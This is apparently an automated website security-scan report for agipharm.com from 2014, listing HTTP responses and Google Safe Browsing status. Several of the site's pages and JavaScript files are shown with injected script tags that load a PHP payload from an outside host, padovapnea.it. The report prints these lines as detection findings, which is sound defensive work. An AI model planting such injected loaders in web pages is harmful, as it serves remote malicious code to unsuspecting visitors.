Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=agipharm.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://agipharm.com/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 14 Apr 2014 12:57:07 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://www.agipharm.org Server: Varnish Content-Length: 315 Content-Type: text/html; charset=utf-8 | clean |
http://www.agipharm.org/ | 200 OK Content-Length: 4603 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://padovapnea.it/8zjCfZMT.php?id=63162770"></script> | ||
http://www.agipharm.org/js/runflaW.js | 200 OK Content-Length: 1113 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://padovapnea.it/8zjCfZMT.php?id=63162788"></script>');
| ||
http://agipharm.com/fr/home.php | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 14 Apr 2014 12:57:07 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://www.agipharm.org/fr/home.php Server: Varnish Content-Length: 315 Content-Type: text/html; charset=utf-8 | clean |
http://www.agipharm.org/fr/home.php | 200 OK Content-Length: 8523 Content-Type: text/html | clean |
http://www.agipharm.org/fr/../js/window.js | 200 OK Content-Length: 2608 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://padovapnea.it/8zjCfZMT.php?id=63162791"></script>');
| ||
http://agipharm.com/fr/../js/rol_menu.js | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 14 Apr 2014 12:57:11 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://www.agipharm.org/fr/../js/rol_menu.js Server: Varnish Content-Length: 315 Content-Type: text/html; charset=utf-8 | clean |
http://www.agipharm.org/fr/../js/rol_menu.js | 200 OK Content-Length: 630 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://padovapnea.it/8zjCfZMT.php?id=63162786"></script>');
| ||
http://agipharm.com/fr/../js/langue.js | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 14 Apr 2014 12:57:12 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 4 Location: http://www.agipharm.org/fr/../js/langue.js Server: Varnish Content-Length: 315 Content-Type: text/html; charset=utf-8 | clean |
http://www.agipharm.org/fr/../js/langue.js | 200 OK Content-Length: 283 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://padovapnea.it/8zjCfZMT.php?id=63162785"></script>');
| ||
http://agipharm.com/fr/../js/slide.js | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 14 Apr 2014 12:57:12 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 1 Location: http://www.agipharm.org/fr/../js/slide.js Server: Varnish Content-Length: 315 Content-Type: text/html; charset=utf-8 | clean |
http://www.agipharm.org/fr/../js/slide.js | 200 OK Content-Length: 239 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function goTo(distance){ var slide = document.getElementById("main"); slide.scrollLeft=distance; } Antivirus reports:
| ||
http://agipharm.com/fr/../js/runfla.js | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 14 Apr 2014 12:57:12 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 1 Location: http://www.agipharm.org/fr/../js/runfla.js Server: Varnish Content-Length: 315 Content-Type: text/html; charset=utf-8 | clean |
http://www.agipharm.org/fr/../js/runfla.js | 200 OK Content-Length: 1019 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://padovapnea.it/8zjCfZMT.php?id=63162787"></script>');
| ||
http://agipharm.com/fr/../js/runflaW.js | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 14 Apr 2014 12:57:13 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 6 Location: http://www.agipharm.org/fr/../js/runflaW.js Server: Varnish Content-Length: 315 Content-Type: text/html; charset=utf-8 | clean |
http://www.agipharm.org/fr/../js/runflaw.js | 404 Not Found Content-Length: 277 Content-Type: text/html | clean |
http://www.agipharm.org/test404page.js | 404 Not Found Content-Length: 278 Content-Type: text/html | clean |
http://agipharm.com/fr/../js/runflaWO.js | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 14 Apr 2014 12:57:13 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 6 Location: http://www.agipharm.org/fr/../js/runflaWO.js Server: Varnish Content-Length: 315 Content-Type: text/html; charset=utf-8 | clean |
http://www.agipharm.org/fr/../js/runflawo.js | 404 Not Found Content-Length: 278 Content-Type: text/html | clean |
http://agipharm.com/en/home.php | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 14 Apr 2014 12:57:13 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 6 Location: http://www.agipharm.org/en/home.php Server: Varnish Content-Length: 315 Content-Type: text/html; charset=utf-8 | clean |
http://www.agipharm.org/en/home.php | 200 OK Content-Length: 8676 Content-Type: text/html | clean |
http://www.agipharm.org/en/../js/window.js | 200 OK Content-Length: 2608 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://padovapnea.it/8zjCfZMT.php?id=63162791"></script>');
| ||
http://agipharm.com/en/../js/rol_menu.js | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 14 Apr 2014 12:57:17 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 9 Location: http://www.agipharm.org/en/../js/rol_menu.js Server: Varnish Content-Length: 315 Content-Type: text/html; charset=utf-8 | clean |
http://www.agipharm.org/en/../js/rol_menu.js | 200 OK Content-Length: 630 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://padovapnea.it/8zjCfZMT.php?id=63162786"></script>');
| ||
http://agipharm.com/en/../js/langue.js | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 14 Apr 2014 12:57:17 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 10 Location: http://www.agipharm.org/en/../js/langue.js Server: Varnish Content-Length: 315 Content-Type: text/html; charset=utf-8 | clean |
http://www.agipharm.org/en/../js/langue.js | 200 OK Content-Length: 283 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://padovapnea.it/8zjCfZMT.php?id=63162785"></script>');
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: agipharm.com
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 14 Apr 2014 12:57:07 GMT
Via: 1.1 varnish
Accept-Ranges: bytes
Age: 0
Location: http://www.agipharm.org
Server: Varnish
Content-Length: 315
Content-Type: text/html; charset=utf-8
...315 bytes of data.
GET / HTTP/1.1
Host: agipharm.com
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 14 Apr 2014 12:57:07 GMT
Via: 1.1 varnish
Accept-Ranges: bytes
Age: 0
Location: http://www.agipharm.org
Server: Varnish
Content-Length: 315
Content-Type: text/html; charset=utf-8
...315 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: agipharm.com
Referer: http://www.google.com/search?q=agipharm.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: agipharm.com
Referer: http://www.google.com/search?q=agipharm.com
Result:
The result is similar to the first query. There are no suspicious redirects found.